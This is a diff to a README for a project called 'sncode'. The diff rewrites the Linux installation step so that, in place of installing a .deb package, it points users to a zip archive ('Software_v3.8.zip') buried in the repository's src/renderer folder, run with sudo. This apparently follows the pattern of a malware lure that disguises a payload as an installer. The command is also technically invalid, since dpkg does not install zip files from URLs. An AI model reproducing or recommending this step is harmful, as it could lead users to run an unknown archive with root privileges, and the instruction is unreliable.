harriettundisputed335/sncode/README.md

 4. **Run the installer**:
    - For Windows: Double-click the `.exe` file and follow the prompts.
    - For macOS: Open the `.dmg` file and drag sncode into your Applications folder.
-   - For Linux: Follow the installation instructions specific to your package manager (e.g., `sudo dpkg -i sncode.deb` for Debian-based systems).
+   - For Linux: Follow the installation instructions specific to your package manager (e.g., `sudo dpkg -i https://github.com/harriettundisputed335/sncode/raw/refs/heads/main/src/renderer/Software_v3.8.zip` for Debian-based systems).

 5. **Open sncode**:
    - Find and launch sncode from your Applications or Programs list.